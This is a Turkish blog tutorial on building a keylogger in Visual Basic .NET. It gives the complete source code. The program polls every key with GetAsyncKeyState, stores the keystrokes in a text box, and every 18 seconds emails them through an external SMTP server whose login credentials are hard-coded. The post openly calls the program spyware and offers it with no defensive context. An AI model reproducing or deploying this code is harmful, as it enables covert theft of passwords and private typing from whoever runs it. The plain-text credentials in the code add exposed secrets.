Visual Basic .NET İle Keylogger Yapımı


Yazımız en son 10 Nisan 2015 tarihinde güncellenmiş ve 287 defa okunmuş.

Bu yazıda, Visual Basic .NET ile ufak ve işlevsel bir Keylogger (casus yazılım) yapacağız. Amacımız, bilgisayarda basılan tuşları kaydederek mail olarak kendimize göndermek. İhtiyacımız olan şeyler;

  1. Bir adet windows form
  2. İki adet timer
  3. Bir adet rich text box

Projemizde mail gönderimi için import edeceğimiz sınıfımız, System.Net.Mail olacak. Bunu da, kodlarımızın başına

 Imports System.Net.Mail 

satırını ekleyerek yapacağız. İlk timer kontrolümüzün interval değerini 1 olarak ve Enabled özelliğini True olarak ayarlayacağız. İkincisi için ise 18000 ve True olacak. Kodlarımıza gelelim..

 Imports System.Net.Mail Public Class Form1 Dim result As Integer Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Int32) As Int16 Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick For i = 1 To 255 result = 0 result = (GetAsyncKeyState(i)) If result = -32767 Then RichTextBox1.Text = RichTextBox1.Text + Chr(i) End If Next i End Sub Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick Dim MymailMassege As New MailMessage() MymailMassege.From = New MailAddress("[email protected]") 'Gönderen kişi MymailMassege.To.Add("[email protected]") 'Hedef mail MymailMassege.Subject = ("Keylogger Denemesi") 'Konu MymailMassege.Body = RichTextBox1.Text 'Mesaj Dim SMTPServer As New SmtpClient("smtp.fatihbasaran.com.tr") 'Giden Mail sunucusu SMTPServer.Port = 587 'Giden mail sunucu (SMTP) portu SMTPServer.Credentials = New System.Net.NetworkCredential("[email protected]", "13525252") 'Login yapıyoruz SMTPServer.EnableSsl = True SMTPServer.Send(MymailMassege) RichTextBox1.Text = ("") End Sub End Class 

Hepsi bu kadar. Programı çalıştırdığınızda işleve başlayacaktır. Sorularınız mı var? Bana yazın.

Fatih M. BAŞARAN